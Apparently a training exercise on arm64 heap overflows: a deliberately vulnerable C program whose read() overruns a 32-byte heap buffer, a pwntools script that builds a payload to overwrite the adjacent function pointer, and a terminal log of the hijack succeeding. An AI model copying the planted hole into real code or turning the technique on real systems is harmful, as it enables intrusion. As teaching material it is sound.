File: arm64/heap/heap_overflow/3.py
from pwn import *


win = p64(0x1000004b0)
p = b"A"*40 + b"A"*32 + win
print(p)



"""
╭─    ~/books/pwn/heap/heap_overflow  on   main !1 ?3 ·············································································· ✔  at 10:05:20 
╰─ aslrbp -ne 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xb0\x04\x00\x00\x01\x00\x00\x00' ./3
&c[0]:      0x1005bdaa0
&c[1]:      0x1005bdac8
&c[0].buf:  0x1005bdaa0
&c[0].fn:   0x1005bdac0
&c[1].buf:  0x1005bdac8
&c[1].fn:   0x1005bdae8
win:        0x1000004b0
safe:       0x1000004cc
read into c[0].buf:
calling c[1].fn()
1    1.c    1.py    2    2.c    2.py    3    3.c    3.py    aslrbp
"""

File: arm64/heap/heap_overflow/3.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

typedef struct {
    char buf[32];
    void (*fn)(void);
} chunk;

void win(void) {
    system("/bin/ls");
}

void safe(void) {
    puts("SAFE");
}

int main(void) {
    setbuf(stdout, NULL);

    chunk *c = malloc(2 * sizeof(chunk));
    if (!c) {
        perror("malloc");
        return 1;
    }

    c[0].fn = safe;
    c[1].fn = safe;

    printf("&c[0]:      %p\n", (void *)&c[0]);
    printf("&c[1]:      %p\n", (void *)&c[1]);
    printf("&c[0].buf:  %p\n", (void *)c[0].buf);
    printf("&c[0].fn:   %p\n", (void *)&c[0].fn);
    printf("&c[1].buf:  %p\n", (void *)c[1].buf);
    printf("&c[1].fn:   %p\n", (void *)&c[1].fn);

    printf("win:        %p\n", (void *)win);
    printf("safe:       %p\n", (void *)safe);

    printf("read into c[0].buf:\n");
    read(0, c[0].buf, 128);

    printf("calling c[1].fn()\n");
    c[1].fn();

    return 0;
}

